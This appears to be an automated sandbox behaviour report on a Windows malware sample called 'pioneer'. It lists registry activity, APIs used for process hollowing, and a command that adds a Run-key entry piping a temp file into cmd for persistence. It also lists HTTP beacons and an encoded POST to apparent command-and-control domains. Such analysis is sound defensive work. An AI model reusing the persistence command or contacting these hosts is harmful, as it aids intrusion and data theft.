HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\pioneer
Write Keys
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\pioneer
Delete Keys
Nothing to display
Mutexes
Global\CLR_CASOFF_MUTEX
Resolved APIs
advapi32.dll.RegOpenKeyExW advapi32.dll.RegQueryInfoKeyW advapi32.dll.RegEnumKeyExW advapi32.dll.RegEnumValueW advapi32.dll.RegCloseKey advapi32.dll.RegQueryValueExW kernel32.dll.FlsAlloc kernel32.dll.FlsFree kernel32.dll.FlsGetValue kernel32.dll.FlsSetValue kernel32.dll.InitializeCriticalSectionEx kernel32.dll.CreateEventExW kernel32.dll.CreateSemaphoreExW kernel32.dll.SetThreadStackGuarantee kernel32.dll.CreateThreadpoolTimer kernel32.dll.SetThreadpoolTimer kernel32.dll.WaitForThreadpoolTimerCallbacks kernel32.dll.CloseThreadpoolTimer kernel32.dll.CreateThreadpoolWait kernel32.dll.SetThreadpoolWait kernel32.dll.CloseThreadpoolWait kernel32.dll.FlushProcessWriteBuffers kernel32.dll.FreeLibraryWhenCallbackReturns kernel32.dll.GetCurrentProcessorNumber kernel32.dll.GetLogicalProcessorInformation kernel32.dll.CreateSymbolicLinkW kernel32.dll.EnumSystemLocalesEx kernel32.dll.CompareStringEx kernel32.dll.GetDateFormatEx kernel32.dll.GetLocaleInfoEx kernel32.dll.GetTimeFormatEx kernel32.dll.GetUserDefaultLocaleName kernel32.dll.IsValidLocaleName kernel32.dll.LCMapStringEx kernel32.dll.GetTickCount64 advapi32.dll.EventRegister mscoree.dll.#142 mscoreei.dll.RegisterShimImplCallback mscoreei.dll.OnShimDllMainCalled mscoreei.dll._CorExeMain shlwapi.dll.UrlIsW version.dll.GetFileVersionInfoSizeW version.dll.GetFileVersionInfoW version.dll.VerQueryValueW kernel32.dll.InitializeCriticalSectionAndSpinCount kernel32.dll.IsProcessorFeaturePresent msvcrt.dll._set_error_mode msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z kernel32.dll.FindActCtxSectionStringW kernel32.dll.GetSystemWindowsDirectoryW mscoree.dll.GetProcessExecutableHeap mscoreei.dll.GetProcessExecutableHeap mscorwks.dll._CorExeMain mscorwks.dll.GetCLRFunction advapi32.dll.RegisterTraceGuidsW advapi32.dll.UnregisterTraceGuids advapi32.dll.GetTraceLoggerHandle advapi32.dll.GetTraceEnableLevel advapi32.dll.GetTraceEnableFlags advapi32.dll.TraceEvent mscoree.dll.IEE mscoreei.dll.IEE mscorwks.dll.IEE mscoree.dll.GetStartupFlags mscoreei.dll.GetStartupFlags mscoree.dll.GetHostConfigurationFile mscoreei.dll.GetHostConfigurationFile mscoreei.dll.GetCORVersion mscoree.dll.GetCORSystemDirectory mscoreei.dll.GetCORSystemDirectory_RetAddr mscoreei.dll.CreateConfigStream ntdll.dll.RtlUnwind kernel32.dll.IsWow64Process advapi32.dll.AllocateAndInitializeSid advapi32.dll.OpenProcessToken advapi32.dll.GetTokenInformation advapi32.dll.InitializeAcl advapi32.dll.AddAccessAllowedAce advapi32.dll.FreeSid kernel32.dll.AddVectoredContinueHandler kernel32.dll.RemoveVectoredContinueHandler advapi32.dll.ConvertSidToStringSidW shell32.dll.SHGetFolderPathW kernel32.dll.GetWriteWatch kernel32.dll.ResetWriteWatch kernel32.dll.CreateMemoryResourceNotification kernel32.dll.QueryMemoryResourceNotification kernel32.dll.QueryActCtxW kernel32.dll.GetVersionExW kernel32.dll.GetFullPathNameW ole32.dll.CoInitializeEx cryptbase.dll.SystemFunction036 ole32.dll.CoGetContextToken advapi32.dll.CryptAcquireContextA advapi32.dll.CryptReleaseContext advapi32.dll.CryptCreateHash advapi32.dll.CryptDestroyHash advapi32.dll.CryptHashData advapi32.dll.CryptGetHashParam advapi32.dll.CryptImportKey advapi32.dll.CryptExportKey advapi32.dll.CryptGenKey advapi32.dll.CryptGetKeyParam advapi32.dll.CryptDestroyKey advapi32.dll.CryptVerifySignatureA advapi32.dll.CryptSignHashA advapi32.dll.CryptGetProvParam advapi32.dll.CryptGetUserKey advapi32.dll.CryptEnumProvidersA mscoree.dll.GetMetaDataInternalInterface mscoreei.dll.GetMetaDataInternalInterface mscorwks.dll.GetMetaDataInternalInterface mscorjit.dll.getJit kernel32.dll.GetUserDefaultUILanguage kernel32.dll.SetErrorMode kernel32.dll.GetFileAttributesExW mscoreei.dll.LoadLibraryShim culture.dll.ConvertLangIdToCultureName kernel32.dll.lstrlen kernel32.dll.lstrlenW mscoree.dll.ND_RI4 mscoreei.dll.ND_RI4 bcrypt.dll.BCryptGetFipsAlgorithmMode kernel32.dll.GlobalMemoryStatusEx kernel32.dll.VirtualProtect kernel32.dll.GetEnvironmentVariableW kernel32.dll.SwitchToThread kernel32.dll.CloseHandle kernel32.dll.GetCurrentProcessId advapi32.dll.LookupPrivilegeValueW kernel32.dll.GetCurrentProcess advapi32.dll.AdjustTokenPrivileges kernel32.dll.OpenProcess psapi.dll.EnumProcessModules psapi.dll.GetModuleInformation psapi.dll.GetModuleBaseNameW psapi.dll.GetModuleFileNameExW kernel32.dll.GetProcAddress kernel32.dll.DebugActiveProcess kernel32.dll.WaitForDebugEvent kernel32.dll.ContinueDebugEvent kernel32.dll.DeleteFileA advapi32.dll.SetKernelObjectSecurity advapi32.dll.GetKernelObjectSecurity ntdll.dll.NtSetInformationProcess ntdll.dll.NtProtectVirtualMemory kernel32.dll.GetSystemInfo kernel32.dll.VirtualQueryEx kernel32.dll.ReadProcessMemory msvcrt.dll.memcmp kernel32.dll.WriteProcessMemory ntdll.dll.NtQuerySystemInformation kernel32.dll.GetModuleFileNameW shfolder.dll.SHGetFolderPathW kernel32.dll.CopyFileW kernel32.dll.LocalFree kernel32.dll.CreatePipe kernel32.dll.DuplicateHandle kernel32.dll.GetStdHandle kernel32.dll.GetCurrentDirectoryW kernel32.dll.CreateProcessW kernel32.dll.GetFileType kernel32.dll.GetConsoleCP kernel32.dll.GetACP kernel32.dll.UnmapViewOfFile kernel32.dll.GetConsoleOutputCP kernel32.dll.WriteFile ole32.dll.CoUninitialize kernel32.dll.CreateActCtxW kernel32.dll.AddRefActCtx kernel32.dll.ReleaseActCtx kernel32.dll.ActivateActCtx kernel32.dll.DeactivateActCtx kernel32.dll.GetCurrentActCtx advapi32.dll.EventUnregister kernel32.dll.SetThreadUILanguage kernel32.dll.SortGetHandle kernel32.dll.SortCloseHandle kernel32.dll.CopyFileExW kernel32.dll.IsDebuggerPresent kernel32.dll.SetConsoleInputExeNameW ntdll.dll.NtQueryInformationProcess kernel32.dll.GetTempPathW kernel32.dll.CreateFileW kernel32.dll.GetFileSize kernel32.dll.ReadFile kernel32.dll.VirtualAllocEx kernel32.dll.GetThreadContext kernel32.dll.Wow64GetThreadContext ntdll.dll.NtUnmapViewOfSection kernel32.dll.ResumeThread kernel32.dll.SetThreadContext kernel32.dll.Wow64SetThreadContext kernel32.dll.TerminateProcess
Execute Commands
"cmd" "C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pioneer.exe" reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "pioneer" /d "cmd /c type "C:\Users\Seven01\AppData\Local\Temp\pioneer.txt" | cmd"
Started Services
Nothing to display
Created Services
Nothing to display
| Behavior analysis details | |||||
|---|---|---|---|---|---|
| Machine name | Machine label | Machine manager | Started | Ended | Duration |
| Seven01_64 | Seven01_64 | VirtualBox | 2017-11-02 18:48:44 | 2017-11-02 18:51:36 | 172 |
9 HTTP Request(s) detected
http://www.brewpubibiza.com/hx139/?id=SbCAU8mf0Z9JEulPyR8cZS1aBijtu3+0k2tctwyGWY55djuHLbz5Gn2TowYWJj3A1MDLhwbR
- Hostname: www.brewpubibiza.com
- IP Address: 85.214.5.17
- Port: 80
- Count: 1
GET /hx139/?id=SbCAU8mf0Z9JEulPyR8cZS1aBijtu3+0k2tctwyGWY55djuHLbz5Gn2TowYWJj3A1MDLhwbR HTTP/1.1 Host: www.brewpubibiza.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.xn--snyi-5na.com/hx139/?id=fyl9cbLQb5R+/8T8tzIY25clItzRxAgCn3SNdxJDm8Cu9sMr7e3Ony8kqC6wyP5YEVOUOgxM
- Hostname: www.xn--snyi-5na.com
- IP Address:
- Port: 80
- Count: 1
GET /hx139/?id=fyl9cbLQb5R+/8T8tzIY25clItzRxAgCn3SNdxJDm8Cu9sMr7e3Ony8kqC6wyP5YEVOUOgxM HTTP/1.1 Host: www.xn--snyi-5na.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.group7schools.com/hx139/?id=DJDfPwBHTQu0QWWyWwUGOsEhw9IAZc4nfTj4bVnVPlkRWQtbgbVKudlyA9Qx2orpkx9kCxCD
- Hostname: www.group7schools.com
- IP Address: 164.160.128.116
- Port: 80
- Count: 1
GET /hx139/?id=DJDfPwBHTQu0QWWyWwUGOsEhw9IAZc4nfTj4bVnVPlkRWQtbgbVKudlyA9Qx2orpkx9kCxCD HTTP/1.1 Host: www.group7schools.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.cdccm.com/hx139/?id=cyOTfcvxCp4M5pb0CWMG0tQGARyzkoXay0uJyxtqrWvdXf+0P/vwE2HJ2IAVQD+wfJX22waZ
- Hostname: www.cdccm.com
- IP Address: 47.52.126.105
- Port: 80
- Count: 1
GET /hx139/?id=cyOTfcvxCp4M5pb0CWMG0tQGARyzkoXay0uJyxtqrWvdXf+0P/vwE2HJ2IAVQD+wfJX22waZ HTTP/1.1 Host: www.cdccm.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.totokualalumpur.net/hx139/?id=oQ0PymUGNvA4epaJNfUUgTf9RmMpng9PBlanyGt5NfcqiuwlaN40BjQegrxIRT9tanqfRbpF
- Hostname: www.totokualalumpur.net
- IP Address: 69.64.147.242
- Port: 80
- Count: 1
GET /hx139/?id=oQ0PymUGNvA4epaJNfUUgTf9RmMpng9PBlanyGt5NfcqiuwlaN40BjQegrxIRT9tanqfRbpF HTTP/1.1 Host: www.totokualalumpur.net Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.bastblossoz.info/hx139/?id=mBTUr0+VXJWv0jl26qEjK+wKvJf2gbCfKhowHOF+s/onaseJOIX9voAXatpS9NQPyTjEOKZx
- Hostname: www.bastblossoz.info
- IP Address: 185.62.189.222
- Port: 80
- Count: 1
GET /hx139/?id=mBTUr0+VXJWv0jl26qEjK+wKvJf2gbCfKhowHOF+s/onaseJOIX9voAXatpS9NQPyTjEOKZx HTTP/1.1 Host: www.bastblossoz.info Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.bastblossoz.info/hx139/
- Hostname: www.bastblossoz.info
- IP Address: 185.62.189.222
- Port: 80
- Count: 1
POST /hx139/ HTTP/1.1 Host: www.bastblossoz.info Connection: close Content-Length: 1641 Cache-Control: no-cache Origin: http://www.bastblossoz.info User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.bastblossoz.info/hx139/ Accept-Language: en-US Accept-Encoding: gzip, deflate dat=01aQ6DqiHdGd4WA1wZJiGL1d9fnA7qLsaS1_WfkKs4glGNf6UKWPiNctU-h3xudYmU-AaeBMlWztOs3xBj4RftrQfudB8AuD4uNHKnn0MOAW83Wz35oFIhtu4NrEBAJiTZi2BIY45ErqMU5-Yc_vYP1I13CeZy1R4crIPZcA3RjrtPwr9YdpHWL9NY7dLnCAWQxnn7G4XwOcRt8g_jmf2zuI1wfn5PwUDVEeN0HjXMm7kL1ALT1ThHnbB4TAg2YsGD22REm7pVZXvyybjGf3-1ncxHPJU_-s50Or0my8tcW42PZqn8rzdsKUyn6OFnGv4KasVZ4tptE9UEknwLdc9xoyDOF7cenkpicrtf88dSeHtbps6vA6IzT8MAsjzaFXA3qtUifKu8pyXkFqd2wkai3THbXoX4fB0YUTTsiu5xy3Lsk8_XR-SQAmYODGyYlGil4i1IAtUBGfpeRng9YNyTjDhFiqU2gyIedIzhZi-9juSeb_-WivfOf2rTCq3FkSh3rotdEjBLGAX9SdVPz40n42x8kvMU59aqPvqI4sx8OSPenYOyTPM2MPwcxTz2l7Zn2suoAJgRqCYJyKzZgPly0vSkFv9hC6G0pndLD0-YnAsl2a7oX9NDp7DXs9VaqTPVcMFORNUIiSrqqH1W5d4rlI02yqopyd1gtF01XGxJTpFm5WKHKa09QPM_8RO3fUIwQegMa4cuoTc8Vzh6Citw6rar4dyTGHEyFXyEL8Bzlvl5NrDfK215ybch5dBvb-26BrcDTYxwDpPlQiEG8ScrHPS2reNqNHP9W5UQOgYGA3yUYhDNJldjqUG5a_0tp2Bnp6Vh1isPfdKzUVsUykOYckYPSqB_iJXnosxoh4HKUKWYLFu8Vv7IIEat0sEr4zdfyX_OtGNhPbWY7sY581KPuXBsmYSTK1HQkNExFH2-H-LQBtelKNXaKVOGD9oe75M0m3KRqtK4bQhWV3q5USumKS1rHHZefvwiq7ly97JT9KxreJGy7tvCfqSyJKJdRNw7H5SQXHIa3KbxW-xDOADAlGt_JWB9nkTqllFWRofuzLyXE-5UD7zOT8H2tgeYcnScnHXXvx4PVj8VQA_AXRV57tUsMCe-xkp5E81GnH_0QL-Tyh2ZjPERcOzzcwHm47EW_NKoOm9Df_BdfJIwfuvi6Fan09KgTcjF7S